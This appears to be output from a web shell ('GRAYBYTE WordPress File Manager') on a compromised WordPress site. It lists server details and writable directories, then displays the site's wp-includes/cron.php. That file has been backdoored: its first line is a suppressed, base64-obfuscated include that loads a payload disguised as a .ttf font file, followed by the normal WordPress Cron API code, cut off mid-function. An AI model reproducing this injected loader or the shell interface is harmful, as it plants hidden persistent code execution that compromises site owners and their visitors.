GRAYBYTE WORDPRESS FILE MANAGER7892

Server IP : 149.255.58.128 / Your IP : 216.73.216.199
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/www.wheelchairantalya.co.uk/wp-includes/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/www.wheelchairantalya.co.uk/wp-includes//cron.php
<?php @include base64_decode("L2hvbWUvd2hlZWxjaDIvd3d3LndoZWVsY2hhaXJhbnRhbHlhLmNvLnVrL3dwLWluY2x1ZGVzL1RleHQvRGlmZi9FbmdpbmUvb3NxbnNxcm5vb25yLnR0Zg==");?><?php
/**
 * WordPress Cron API
 *
 * @package WordPress
 */

/**
 * Schedules an event to run only once.
 *
 * Schedules a hook which will be triggered by WordPress at the specified UTC time.
 * The action will trigger when someone visits your WordPress site if the scheduled
 * time has passed.
 *
 * Note that scheduling an event to occur within 10 minutes of an existing event
 * with the same action hook will be ignored unless you pass unique `$args` values
 * for each scheduled event.
 *
 * Use wp_next_scheduled() to prevent duplicate events.
 *
 * Use wp_schedule_event() to schedule a recurring event.
 *
 * @since 2.1.0
 * @since 5.1.0 Return value modified to boolean indicating success or failure,
 *              {@see 'pre_schedule_event'} filter added to short-circuit the function.
 * @since 5.7.0 The `$wp_error` parameter was added.
 *
 * @link https://developer.wordpress.org/reference/functions/wp_schedule_single_event/
 *
 * @param int    $timestamp  Unix timestamp (UTC) for when to next run the event.
 * @param string $hook       Action hook to execute when the event is run.
 * @param array  $args       Optional. Array containing arguments to pass to the
 *                           hook's callback function. Each value in the array
 *                           is passed to the callback as an individual parameter.
 *                           The array keys are ignored. Default empty array.
 * @param bool   $wp_error   Optional. Whether to return a WP_Error on failure. Default false.
 * @return bool|WP_Error True if event successfully scheduled. False or WP_Error on failure.
 */
function wp_schedule_single_event( $timestamp, $hook, $args = array(), $wp_error = false ) {
	// Make sure timestamp is a positive integer.
	if ( ! is_numeric( $timestamp ) || $timestamp <= 0 ) {
		if ( $wp_error ) {
			return new WP_Error(
				'invalid_timestamp',
				__( 'Event timestamp must be a valid Unix timestamp.' )
			);
		}

		return false;
	}

	$event = (object) array(
		'hook'      => $hook,
		'timestamp' => $timestamp,
		'schedule'  => false,
		'args'      => $args,
	);

	/**
	 * Filter to override scheduling an event.
	 *
	 * Returning a non-null value will short-circuit adding the event to the
	 * cron array, causing the function to return the filtered value instead.
	 *
	 * Both single events and recurring events are passed through this filter;
	 * single events have `$event->schedule` as false, whereas recurring events
	 * have this set to a recurrence from wp_get_schedules(). Recurring
	 * events also have the integer recurrence interval set as `$event->interval`.
	 *
	 * For plugins replacing wp-cron, it is recommended you check for an
	 * identical event within ten minutes and apply the {@see 'schedule_event'}
	 * filter to check if another plugin has disallowed the event before scheduling.
	 *
	 * Return true if the event was scheduled, false or a WP_Error if not.
	 *
	 * @since 5.1.0
	 * @since 5.7.0 The `$wp_error` parameter was added, and a `WP_Error` object can now be returned.
	 *
	 * @param null|bool|WP_Error $result   The value to return instead. Default null to continue adding the event.
	 * @param object             $event    {
	 *     An object containing an event's data.
	 *
	 *     @type string       $hook      Action hook to execute when the event is run.
	 *     @type int          $timestamp Unix timestamp (UTC) for when to next run the event.
	 *     @type string|false $schedule  How often the event should subsequently recur.
	 *     @type array        $args      Array containing each separate argument to pass to the hook's callback function.
	 *     @type int          $interval  Optional. The interval time in seconds for the schedule. Only present for recurring events.
	 * }
	 * @param bool               $wp_error Whether to return a WP_Error on failure.
	 */
	$pre = apply_filters( 'pre_schedule_event', null, $event, $wp_error );

	if ( null !== $pre ) {
		if ( $wp_error && false === $pre ) {
			return new WP_Error(
				'pre_schedule_event_false',
				__( 'A plugin prevented the event from being scheduled.' )
			);
		}

		if ( ! $wp_error && is_wp_error( $pre ) ) {
			return false;
		}

		return $pre;
	}

	/*
	 * Check for a duplicated event.
	 *
	 * Don't schedule an event if there's already an identical event
	 * within 10 minutes.
	 *
	 * When scheduling events within ten minutes of the current time,
	 * all past identical events are considered duplicates.
	 *
	 * When scheduling an event with a past timestamp (ie, before the
	 * current time) all events scheduled within the next ten minutes
	 * are considered duplicates.
	 */
	$crons = _get_cron_array();

	$key       = md5( serialize( $event->args ) );
	$duplicate = false;

	if ( $event->timestamp < time() + 10 * MINUTE_IN_SECONDS ) {
		$min_timestamp = 0;
	} else {
		$min_timestamp = $event->timestamp - 10 * MINUTE_IN_SECONDS;
	}

	if ( $event->timestamp < time() ) {
		$max_timestamp = time() + 10 * MINUTE_IN_SECONDS;
	} else {
		$max_timestamp = $event->timestamp + 10 * MINUTE_IN_SECONDS;
	}

	foreach ( $crons as $event_timestamp => $cron ) {
		if ( $event_timestamp < $min_timestamp ) {
			continue;
		}

		if ( $event_timestamp > $max_timestamp ) {
			break;
		}

		if ( isset( $cron[ $event->hook ][ $key ] ) ) {
			$duplicate = true;
			break;
		}
	}

	if ( $duplicate ) {
		if ( $wp_error ) {
			return new WP_Error(
				'duplicate_event',
				__( 'A duplicate event already exists.' )
			);
		}

		return false;
	}

	/**
	 * Modify an event before it is scheduled.
	 *
	 * @since 3.1.0
	 *
	 * @param object|false $event {
	 *     An object containing an event's data, or boolean false to prevent the event from being scheduled.
	 *
	 *     @type string       $hook      Action hook to execute when the event is run.
	 *     @type int          $timestamp Unix timestamp (UTC) for when to next run the event.
	 *     @type string|false $schedule  How often the event should subsequently recur.
	 *     @type array        $args      Array containing each separate argument to pass to the hook's callback function.
	 *     @type int          $interval  Optional. The interval time in seconds for the schedule. Only present for recurring events.
	 * }
	 */
	$event = apply_filters( 'schedule_event', $event );

	// A plugin disallowed this event.
	if ( ! $event ) {
		if ( $wp_error ) {
			return new WP_Error(
				'schedule_event_false',
				__( 'A plugin disallowed this event.' )
			);
		}

		return false;
	}

	$crons[ $event->timestamp ][ $event->hook ][ $key ] = array(
		'schedule' => $event->schedule,
		'args'     => $event->args,
	);
	uksort( $crons, 'strnatcasecmp' );

	return _set_cron_array( $crons, $wp_error );
}

/**
 * Schedules a recurring event.
 *
 * Schedules a hook which will be triggered by WordPress at the specified interval.
 * The action will trigger when someone visits your WordPress site if the scheduled
 * time has passed.
 *
 * Valid values for the recurrence are 'hourly', 'twicedaily', 'daily', and 'weekly'.
 * These can be extended using the {@see 'cron_schedules'} filter in wp_get_schedules().
 *
 * Use wp_next_scheduled() to prevent duplicate events.
 *
 * Use wp_schedule_single_event() to schedule a non-recurring event.
 *
 * @since 2.1.0
 * @since 5.1.0 Return value modified to boolean indicating success or failure,
 *              {@see 'pre_schedule_event'} filter added to short-circuit the function.
 * @since 5.7.0 The `$wp_error` parameter was added.
 *
 * @link https://developer.wordpress.org/reference/functions/wp_schedule_event/
 *
 * @param int    $timestamp  Unix timestamp (UTC) for when to next run the event.
 * @param string $recurrence How often the event should subsequently recur.
 *                           See wp_get_schedules() for accepted values.
 * @param string $hook       Action hook to execute when the event is run.
 * @param array  $args       Optional. Array containing arguments to pass to the
 *                           hook's callback function. Each value in the array
 *                           is passed to the callback as an individual parameter.
 *                           The array keys are ignored. Default empty array.
 * @param bool   $wp_error   Optional. Whether to return a WP_Error on failure. Default false.
 * @return bool|WP_Error True if event successfully scheduled. False or WP_Error on failure.
 */
function wp_schedule_event( $timestamp, $recurrence, $hook, $args = array(), $wp_error = false ) {
	// Make sure timestamp is a positive integer.
	if ( ! is_numeric( $timestamp ) || $timestamp <= 0 ) {
		if ( $wp_error ) {
			return new WP_Error(
				'invalid_timestamp',
				__( 'Event timestamp must be a valid Unix timestamp.' )
			);
		}

		return false;
	}

	$schedules = wp_get_schedules();

	if ( ! isset( $schedules[ $recurrence ] ) ) {
		if ( $wp_error ) {
			return new WP_Error(
				'invalid_schedule',
				__( 'Event schedule does not exist.' )
			);
		}

		return false;
	}

	$event = (object) array(
		'hook'      => $hook,
		'timestamp' => $timestamp,
		'schedule'  => $recurrence,
		'args'      => $args,
		'interval'  => $schedules[ $recurrence ]['interval'],
	);

	/** This filter is documented in wp-includes/cron.php */
	$pre = apply_filters( 'pre_schedule_event', null, $event, $wp_error );

	if ( null !== $pre ) {
		if ( $wp_error && false === $pre ) {
			return new WP_Error(
				'pre_schedule_event_false',
				__( 'A plugin prevented the event from being scheduled.' )
			);
		}

		if ( ! $wp_error && is_wp_error( $pre ) ) {
			return false;
		}

		return $pre;
	}

	/** This filter is documented in wp-includes/cron.php */
	$event = apply_filters( 'schedule_event', $event );

	// A plugin disallowed this event.
	if ( ! $event ) {
		if ( $wp_error ) {
			return new WP_Error(
				'schedule_event_false',
				__( 'A plugin disallowed this event.' )
			);
		}

		return false;
	}

	$key = md5( serialize( $event->args ) );

	$crons = _get_cron_array();

	$crons[ $event->timestamp ][ $event->hook ][ $key ] = array(
		'schedule' => $event->schedule,
		'args'     => $event->args,
		'interval' => $event->interval,
	);
	uksort( $crons, 'strnatcasecmp' );

	return _set_cron_array( $crons, $wp_error );
}

/**
 * Reschedules a recurring event.
 *
 * Mainly for internal use, this takes the Unix timestamp (UTC) of a previously run
 * recurring event and reschedules it for its next run.
 *
 * To change upcoming scheduled events, use wp_schedule_event() to
 * change the recurrence frequency.
 *
 * @since 2.1.0
 * @since 5.1.0 Return value modified to boolean indicating success or failure,
 *              {@see 'pre_reschedule_event'} filter added to short-circuit the function.
 * @since 5.7.0 The `$wp_error` parameter was added.
 *
 * @param int    $timestamp  Unix timestamp (UTC) for when the event was scheduled.
 * @param string $recurrence How often the event should subsequently recur.
 *                           See wp_get_schedules() for accepted values.
 * @param string $hook       Action hook to execute when the event is run.
 * @param array  $args       Optional. Array containing arguments to pass to the
 *                           hook's callback function. Each value in the array
 *                           is passed to the callback as an individual parameter.
 *                           The array keys are ignored. Default empty array.
 * @param bool   $wp_error   Optional. Whether to return a WP_Error on failure. Default false.
 * @return bool|WP_Error True if event successfully rescheduled. False or WP_Error on failure.
 */
function wp_reschedule_event( $timestamp, $recurrence, $hook, $args = array(), $wp_error = false ) {
	// Make sure timestamp is a positive integer.
	if ( ! is_numeric( $timestamp ) || $timestamp <= 0 ) {
		if ( $wp_error ) {
			return new WP_Error(
				'invalid_timestamp',
				__( 'Event timestamp must be a valid Unix timestamp.' )
			);
		}

		return false;
	}

	$schedules = wp_get_schedules();
	$interval  = 0;

	// First we try to get the interval from the schedule.
	if ( isset( $schedules[ $recurrence ] ) ) {
		$interval = $schedules[ $recurrence ]['interval'];
	}

	// Now we try to get it from the saved interval in case the schedule disappears.
	if ( 0 === $interval ) {
		$scheduled_event = wp_get_scheduled_event( $hook, $args, $timestamp );

		if ( $scheduled_event && isset( $scheduled_event->interval ) ) {
			$interval = $scheduled_event->interval;
		}
	}

	$event = (object) array(
		'hook'      => $hook,
		'timestamp' => $timestamp,
		'schedule'  => $recurrence,
		'args'      => $args,
		'interval'  => $interval,
	);

	/**
	 * Filter to override rescheduling of a recurring event.
	 *
	 * Returning a non-null value will short-circuit the normal rescheduling
	 * process, causing the function to return the filtered value instead.
	 *
	 * For plugins replacing wp-cron, return true if the event was successfully
	 * rescheduled, false or a WP_Error if not.
	 *
	 * @since 5.1.0
	 * @since 5.7.0 The `$wp_error` parameter was added, and a `WP_Error` object can now be returned.
	 *
	 * @param null|bool|WP_Error $pre      Value to return instead. Default null to continue adding the event.
	 * @param object             $event    {
	 *     An object containing an event's data.
	 *
	 *     @type string $hook      Action hook to execute when the event is run.
	 *     @type int    $timestamp Unix timestamp (UTC) for when to next run the event.
	 *     @type string $schedule  How often the event should subsequently recur.
	 *     @type array  $args      Array containing each separate argument to pass to the hook's callback function.
	 *     @type int    $interval  The interval time in seconds for the schedule.
	 * }
	 * @param bool               $wp_error Whether to return a WP_Error on failure.
	 */
	$pre = apply_filters( 'pre_reschedule_event', null, $event, $wp_error );

	if ( null !== $pre ) {
		if ( $wp_error && false === $pre ) {
			return new WP_Error(
				'pre_reschedule_event_false',
				__( 'A plugin prevented the event from being rescheduled.' )
			);
		}

		if ( ! $wp_error && is_wp_error( $pre ) ) {
			return false;
		}

		return $pre;
	}

	// Now we assume something is wrong and fail to schedule.
	if ( 0 === $interval ) {
		if ( $wp_error ) {
			return new WP_Error(
				'invalid_schedule',
				__( 'Event schedule does not exist.' )
			);
		}

		return false;
	}

	$now = time();

	if ( $timestamp >= $now ) {
		$timestamp = $now + $interval;
	} else {
		$timestamp = $now + ( $interval - ( ( $now - $timestamp ) % $interval ) );
	}

	return wp_schedule_event( $timestamp, $recurrence, $hook, $args, $wp_error );
}

/**
 * Unschedules a previously scheduled event.
 *
 * The `$timestamp` and `$hook` parameters are required so that the event can be
 * identified.
 *
 * @since 2.1.0
 * @since 5.1.0 Return value modified to boolean indicating success or failure,
 *              {@see 'pre_unschedule_event'} filter added to short-circuit the function.
 * @since 5.7.0 The `$wp_error` parameter was added.
 *
 * @param int    $timestamp Unix timestamp (UTC) of the event.
 * @param string $hook      Action hook of the event.
 * @param array  $args      Optional. Array containing each separate argument to pass to the hook's callback function.
 *                          Although not passed to a callback, these arguments are used to uniquely identify the
 *                          event, so they should be the same as those used when originally scheduling the event.
 *                          Default empty array.
 * @param bool   $wp_error  Optional. Whether to return a WP_Error on failure. Default false.
 * @return bool|WP_Error True if event successfully unscheduled. False or WP_Error on failure.
 */
function wp_unschedule_event( $timestamp, $hook, $args = array(), $wp_error = false ) {
	// Make sure timestamp is a positive integer.
	if ( ! is_numeric( $timestamp ) || $timestamp <= 0 ) {
		if ( $wp_error ) {
			return new WP_Error(
				'invalid_timestamp',
				__( 'Event timestamp must be a valid Unix timestamp.' )
			);
		}

		return false;
	}

	/**
	 * Filter to override unscheduling of events.
	 *
	 * Returning a non-null value will short-circuit the normal unscheduling
	 * process, causing the function to return the filtered value instead.
	 *
	 * For plugins replacing wp-cron, return true if the event was successfully
	 * unscheduled, false or a WP_Error if not.
	 *
	 * @since 5.1.0
	 * @since 5.7.0 The `$wp_error` parameter was added, and a `WP_Error` object can now be returned.
	 *
	 * @param null|bool|WP_Error $pre       Value to return instead. Default null to continue unscheduling the event.
	 * @param int                $timestamp Unix timestamp (UTC) for when to run the event.
	 * @param string             $hook      Action hook, the execution of which will be unscheduled.
	 * @param array              $args      Arguments to pass to the hook's callback function.
	 * @param bool               $wp_error  Whether to return a WP_Error on failure.
	 */
	$pre = apply_filters( 'pre_unschedule_event', null, $timestamp, $hook, $args, $wp_error );

	if ( null !== $pre ) {
		if ( $wp_error && false === $pre ) {
			return new WP_Error(
				'pre_unschedule_event_false',
				__( 'A plugin prevented the event from being unscheduled.' )
			);
		}

		if ( ! $wp_error && is_wp_error( $pre ) ) {
			return false;
		}

		return $pre;
	}

	$crons = _get_cron_array();
	$key   = md5( serialize( $args ) );

	unset( $crons[ $timestamp ][ $hook ][ $key ] );

	if ( empty( $crons[ $timestamp ][ $hook ] ) ) {
		unset( $crons[ $timestamp ][ $hook ] );
	}

	if ( empty( $crons[ $timestamp ] ) ) {
		unset( $crons[ $timestamp ] );
	}

	return _set_cron_array( $crons, $wp_error );
}

/**
 * Unschedules all events attached to the hook with the specified arguments.
 *
 * Warning: This function may return boolean false, but may also return a non-boolean
 * value which evaluates to false. For information about casting to booleans see the
 * {@link https://www.php.net/manual/en/language.types.boolean.php PHP documentation}. Use
 * the `===` operator for testing the return value of this function.
 *
 * @since 2.1.0
 * @since 5.1.0 Return value modified to indicate success or failure,
 *              {@see 'pre_clear_scheduled_hook'} filter added to short-circuit the function.
 * @since 5.7.0 The `$wp_error` parameter was added.
 *
 * @param string $hook     Action hook, the execution of which will be unscheduled.
 * @param array  $args     Optional. Array containing each separate argument to pass to the hook's callback function.
 *                         Although not passed to a callback, these arguments are used to uniquely identify the
 *                         event, so they should be the same as those used when originally scheduling the event.
 *                         Default empty array.
 * @param bool   $wp_error Optional. Whether to return a WP_Error on failure. Default false.
 * @return int|false|WP_Error On success an integer indicating number of events unscheduled (0 indicates no
 *                            events were registered with the hook and arguments combination), false or WP_Error
 *                            if unscheduling one or more events fail.
 */
function wp_clear_scheduled_hook( $hook, $args = array(), $wp_error = false ) {
	/*
	 * Backward compatibility.
	 * Previously, this function took the arguments as discrete vars rather than an array like the rest of the API.
	 */
	if ( ! is_array( $args ) ) {
		_deprecated_argument(
			__FUNCTION__,
			'3.0.0',
			__( 'This argument has changed to an array to match the behavior of the other cron functions.' )
		);

		$args     = array_slice( func_get_args(), 1 ); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection
		$wp_error = false;
	}

	/**
	 * Filter to override clearing a scheduled hook.
	 *
	 * Returning a non-null value will short-circuit the normal unscheduling
	 * process, causing the function to return the filtered value instead.
	 *
	 * For plugins replacing wp-cron, return the number of events successfully
	 * unscheduled (zero if no events were registered with the hook) or false
	 * or a WP_Error if unscheduling one or more events fails.
	 *
	 * @since 5.1.0
	 * @since 5.7.0 The `$wp_error` parameter was added, and a `WP_Error` object can now be returned.
	 *
	 * @param null|int|false|WP_Error $pre      Value to return instead. Default null to continue unscheduling the event.
	 * @param string                  $hook     Action hook, the execution of which will be unscheduled.
	 * @param array                   $args     Arguments to pass to the hook's callback function.
	 * @param bool                    $wp_error Whether to return a WP_Error on failure.
	 */
	$pre = apply_filters( 'pre_clear_scheduled_hook', null, $hook, $args, $wp_error );

	if ( null !== $pre ) {
		if ( $wp_error && false === $pre ) {
			return new WP_Error(
				'pre_clear_scheduled_hook_false',
				__( 'A plugin prevented the hook from being cleared.' )
			);
		}

		if ( ! $wp_error && is_wp_error( $pre ) ) {
			return false;
		}

		return $pre;
	}

	/*
	 * This logic duplicates wp_next_scheduled().
	 * It's required due to a scenario where wp_unschedule_event() fails due to update_option() failing,
	 * and, wp_next_scheduled() returns the same schedule in an infinite loop.
	 */
	$crons = _get_cron_array();
	if ( empty( $crons ) ) {
		return 0;
	}

	$results = array();
	$key     = md5( serialize( $args ) );

	foreach ( $crons as $timestamp => $cron ) {
		if ( isset( $cron[ $hook ][ $key ] ) ) {
			$results[] = wp_unschedule_event( $timestamp, $hook, $args, true );
		}
	}

	$errors = array_filter( $results, 'is_wp_error' );
	$error  = new WP_Error();

	if ( $errors ) {
		if ( $wp_error ) {
			array_walk( $errors, array( $error, 'merge_from' ) );

			return $error;
		}

		return false;
	}

	return count( $results );
}

/**
 * Unschedules all events attached to the hook.
 *
 * Can be useful for plugins when deactivating to clean up the cron queue.
 *
 * Warning: This function may return boolean false, but may also return a non-boolean
 * value which evaluates to false. For information about casting to booleans see the
 * {@link https://www.php.net/manual/en/language.types.boolean.php PHP documentation}. Use
 * the `===` operator for testing the return value of this function.
 *
 * @since 4.9.0
 * @since 5.1.0 Return value added to indicate success or failure.
 * @since 5.7.0 The `$wp_error` parameter was added.
 *
 * @param string $hook     Action hook, the execution of which will be unscheduled.
 * @param bool   $wp_error Optional. Whether to return a WP_Error on failure. Default false.
 * @return int|false|WP_Error On success an integer indicating number of events unscheduled (0 indicates no
 *                            events were registered on the hook), false or WP_Error if unscheduling fails.
 */
function wp_unschedule_hook( $hook, $wp_error = false ) {
	/**
	 * Filter to override clearing all events attached to the hook.
	 *
	 * Returning a non-null value will short-circuit the normal unscheduling
	 * process, causing the function to return the filtered value instead.
	 *
	 * For plugins replacing wp-cron, return the number of events successfully
	 * unscheduled (zero if no events were registered with the hook). If unscheduling
	 * one or more events fails then return either a WP_Error object or false depending
	 * on the value of the `$wp_error` parameter.
	 *
	 * @since 5.1.0
	 * @since 5.7.0 The `$wp_error` parameter was added, and a `WP_Error` object can now be returned.
	 *
	 * @param null|int|false|WP_Error $pre      Value to return instead. Default null to continue unscheduling the hook.
	 * @param string                  $hook     Action hook, the execution of which will be unscheduled.
	 * @param bool                    $wp_error Whether to return a WP_Error on failure.
	 */
	$pre = apply_filters( 'pre_unschedule_hook', null, $hook, $wp_error );

	if ( null !== $pre ) {
		if ( $wp_error && false === $pre ) {
			return new WP_Error(
				'pre_unschedule_hook_false',
				__( 'A plugin prevented the hook from being cleared.' )
			);
		}

		if ( ! $wp_error && is_wp_error( $pre ) ) {
			return false;
		}

		return $pre;
	}

	$crons = _get_cron_array();
	if ( empty( $crons ) ) {
		return 0;
	}

	$results = array();

	foreach ( $crons as $timestamp => $args ) {
		if ( ! empty( $crons[ $timestamp ][ $hook ] ) ) {
			$results[] = count( $crons[ $timestamp ][ $hook ] );
		}

		unset( $crons[ $timestamp ][ $hook ] );

		if ( empty( $crons[ $timestamp ] ) ) {
			unset( $crons[ $timestamp ] );
		}
	}

	/*
	 * If the results are empty (zero events to unschedule), no attempt
	 * to update the cron array is required.
	 */
	if ( empty( $results ) ) {
		return 0;
	}

	$set = _set_cron_array( $crons, $wp_error );

	if ( true === $set ) {
		return array_sum( $results );
	}

	return $set;
}

/**
 * Retrieves a scheduled event.
 *
 * Retrieves the full event object for a given event, if no timestamp is specified the next
 * scheduled event is returned.
 *
 * @since 5.1.0
 *
 * @param string   $hook      Action hook of the event.
 * @param array    $args      Optional. Array containing each separate argument to pass to the hook's callback function.
 *                            Although not passed to a callback, these arguments are used to uniquely identify the
 *                            event, so they should be the same as those used when originally scheduling the event.
 *                            Default empty array.
 * @param int|null $timestamp Optional. Unix timestamp (UTC) of the event. If not specified, the next scheduled event
 *                            is returned. Default null.
 * @return object|false {
 *     The event object. False if the event does not exist.
 *
 *     @type string       $hook      Action hook to execute when the event is run.
 *     @type int          $timestamp Unix timestamp (UTC) for when to next run the event.
 *     @type string|false $schedule  How often the event should subsequently recur.
 *     @type array        $args      Array containing each separate argument to pass to the hook's callback function.
 *     @type int          $interval  Optional. The interval time in seconds for the schedule. Only present for recurring events.
 * }
 */
function wp_get_scheduled_event( $hook, $args = array(), $timestamp = null ) {
	/**
	 * Filter to override retrieving a scheduled event.
	 *
	 * Returning a non-null value will short-circuit the normal process,
	 * returning the filtered value instead.
	 *
	 * Return false if the event does not exist, otherwise an event object
	 * should be returned.
	 *
	 * @since 5.1.0
	 *
	 * @param null|false|object $pre  Value to return instead. Default null to continue retrieving the event.
	 * @param string            $hook Action hook of the event.
	 * @param array             $args Array containing each separate argument to pass to the hook's callback function.
	 *                                Although not passed to a callback, these arguments are used to uniquely identify
	 *                                the event.
	 * @param int|null  $timestamp Unix timestamp (UTC) of the event. Null to retrieve next scheduled event.
	 */
	$pre = apply_filters( 'pre_get_scheduled_event', null, $hook, $args, $timestamp );

	if ( null !== $pre ) {
		return $pre;
	}

	if ( null !== $timestamp && ! is_numeric( $timestamp ) ) {
		return false;
	}

	$crons = _get_cron_array();
	if ( empty( $crons ) ) {
		return false;
	}

	$key = md5( serialize( $args ) );

	if ( ! $timestamp ) {
		// Get next event.
		$next = false;
		foreach ( $crons as $timestamp => $cron ) {
			if ( isset( $cron[ $hook ][ $key ] ) ) {
				$next = $timestamp;
				break;
			}
		}

		if ( ! $next ) {
			return false;
		}

		$timestamp = $next;
	} elseif ( ! isset( $crons[ $timestamp ][ $hook ][ $key ] ) ) {
		return false;
	}

	$event = (object) array(
		'hook'      => $hook,
		'timestamp' => $timestamp,
		'schedule'  => $crons[ $timestamp ][ $hook ][ $key ]['schedule'],
		'args'      => $args,
	);

	if ( isset( $crons[ $timestamp ][ $hook ][ $key ]['interval'] ) ) {
		$event->interval = $crons[ $timestamp ][ $hook ][ $key ]['interval'];
	}

	return $event;
}

/**
 * Retrieves the timestamp of the next scheduled event for the given hook.
 *
 * @since 2.1.0
 *
 * @param string $hook Action hook of the event.
 * @param array  $args Optional. Array containing each separate argument to pass to the hook's callback function.
 *                     Although not passed to a callback, these arguments are used to uniquely identify the
 *                     event, so they should be the same as those used when originally scheduling the event.
 *                     Default empty array.
 * @return int|false The Unix timestamp (UTC) of the next time the event will occur. False if the event doesn't exist.
 */
function wp_next_scheduled( $hook, $args = array() ) {
	$next_event = wp_get_scheduled_event( $hook, $args );

	if ( ! $next_event ) {
		return false;
	}

	/**
	 * Filters the timestamp of the next scheduled event for the given hook.
	 *
	 * @since 6.8.0
	 *
	 * @param int    $timestamp  Unix timestamp (UTC) for when to next run the event.
	 * @param object $next_event {
	 *     An object containing an event's data.
	 *
	 *     @type string $hook      Action hook of the event.
	 *     @type int    $timestamp Unix timestamp (UTC) for when to next run the event.
	 *     @type string $schedule  How often the event should subsequently recur.
	 *     @type array  $args      Array containing each separate argument to pass to the hook
	 *                             callback function.
	 *     @type int    $interval  Optional. The interval time in seconds for the schedule. Only
	 *                             present for recurring events.
	 * }
	 * @param array  $args       Array containing each separate argument to pass to the hook
	 *                           callback function.
	 */
	return apply_filters( 'wp_next_scheduled', $next_event->timestamp, $next_event, $hook, $args );
}

/**
 * Sends a request to run cron through HTTP request that doesn't halt page loading.
 *
 * @since 2.1.0
 * @since 5.1.0 Return values added.
 *
 * @param int $gmt_time Optional. Unix timestamp (UTC). Default 0 (current time is used).
 * @return bool True if spawned, false if no events spawned.
 */
function spawn_cron( $gmt_time = 0 ) {
	if ( ! $gmt_time ) {
		$gmt_time = microtime( true );
	}

	if ( defined( 'DOING_CRON' ) || isset( $_GET['doing_wp_cron'] ) ) {
		return false;
	}

	/*
	 * Get the cron lock, which is a Unix timestamp of when the last cron was spawned
	 * and has not finished running.
	 *
	 * Multiple processes on multiple web servers can run this code concurrently,
	 * this lock attempts to make spawning as atomic as possible.
	 */
	$lock = (float) get_transient( 'doing_cron' );

	if ( $lock > $gmt_time + 10 * MINUTE_IN_SECONDS ) {
		$lock = 0;
	}

	// Don't run if another process is currently running it or more than once every 60 sec.
	if ( $lock + WP_CRON_LOCK_TIMEOUT > $gmt_time ) {
		return false;
	}

	// Confidence check.
	$crons = wp_get_ready_cron_jobs();
	if ( empty( $crons ) ) {
		return false;
	}

	$keys = array_keys( $crons );
	if ( isset( $keys[0] ) && $keys[0] > $gmt_time ) {
		return false;
	}

	if ( defined( 'ALTERNATE_WP_CRON' ) && ALTERNATE_WP_CRON ) {
		if ( 'GET' !== $_SERVER['REQUEST_METHOD'] || defined( 'DOING_AJAX' ) || defined( 'XMLRPC_REQUEST' ) ) {
			return false;
		}

		$doing_wp_cron = sprintf( '%.22F', $gmt_time );
		set_transient( 'doing_cron', $doing_wp_cron );

		ob_start();
		wp_redirect( add_query_arg( 'doing_wp_cron', $doing_wp_cron, wp_unslash( $_SERVER['REQUEST_URI'] ) ) );
		echo ' ';

		// Flush any buffers and send the headers.
		wp_ob_end_flush_all();
		flush();

		require_once ABSPATH . 'wp-cron.php';
		return true;
	}

	// Set the cron lock with the current unix timestamp, when the cron is being spawned.
	$doing_wp_cron = sprintf( '%.22F', $gmt_time );
	set_transient( 'doing_cron', $doing_wp_cron );

	/**
	 * Filters the cron request arguments.
	 *
	 * @since 3.5.0
	 * @since 4.5.0 The `$doing_wp_cron` parameter was added.
	 *
	 * @param array $cron_request_array {
	 *     An array of cron request URL arguments.
	 *
	 *     @type string $url  The cron request URL.
	 *     @type int    $key  The 22 digit GMT microtime.
	 *     @type array  $args {
	 *         An array of cron request arguments.
	 *
	 *         @type int  $timeout   The request timeout in seconds. Default .01 seconds.
	 *         @type bool $blocking  Whether to set blocking for the request. Default false.
	 *         @type bool $sslverify Whether SSL should be verified for the request. Default false.
	 *     }
	 * }
	 * @param string $doing_wp_cron The Unix timestamp (UTC) of the cron lock.
	 */
	$cron_request = apply_filters(
		'cron_request',
		array(
			'url'  => add_query_arg( 'doing_wp_cron', $doing_wp_cron, site_url( 'wp-cron.php' ) ),
			'key'  => $doing_wp_cron,
			'args' => array(
				'timeout'   => 0.01,
				'blocking'  => false,
				/** This filter is documented in wp-includes/class-wp-http-streams.php */
				'sslverify' => apply_filters( 'https_local_ssl_verify', false ),
			),
		),
		$doing_wp_cron
	);

	$result = wp_remote_post( $cron_request['url'], $cron_request['args'] );

	return ! is_wp_error( $result );
}

/**
 * Registers _wp_cron() to run on the {@see 'wp_loaded'} action.
 *
 * If the {@see 'wp_loaded'} action has already fired, this function calls
 * _wp_cron() directly.
 *
 * Warning: This function may return Boolean FALSE, but may also return a non-Boolean
 * value which evaluates to FALSE. For information about casting to booleans see the
 * {@link https://www.php.net/manual/en/language.types.boolean.php PHP documentation}. Use
 * the `===` operator for testing the return value of this function.
 *
 * @since 2.1.0
 * @since 5.1.0 Return value added to indicate success or failure.
 * @since 5.7.0 Functionality moved to _wp_cron() to which this becomes a wrapper.
 *
 * @return false|int|void On success an integer indicating number of events spawned (0 indicates no
 *                        events needed to be spawned), false if spawning fails for one or more events or
 *                        void if the function registered _wp_cron() to run on the action.
 */
function wp_cron() {
	if ( did_action( 'wp_loaded' ) ) {
		return _wp_cron();
	}

	add_action( 'wp_loaded', '_wp_cron', 20 );
}

/**
 * Runs scheduled callbacks or spawns cron for all scheduled events.
 *
 * Warning: This function may return Boolean FALSE, but may also return a non-Boolean
 * value which evaluates to FALSE. For information about casting to booleans see the
 * {@link https://www.php.net/manual/en/language.types.boolean.php PHP documentation}. Use
 * the `===` operator for testing the return value of this function.
 *
 * @since 5.7.0
 * @access private
 *
 * @return int|false On success an integer indicating number of events spawned (0 indicates no
 *                   events needed to be spawned), false if spawning fails for one or more events.
 */
function _wp_cron() {
	// Prevent infinite loops caused by lack of wp-cron.php.
	if ( str_contains( $_SERVER['REQUEST_URI'], '/wp-cron.php' )
		|| ( defined( 'DISABLE_WP_CRON' ) && DISABLE_WP_CRON )
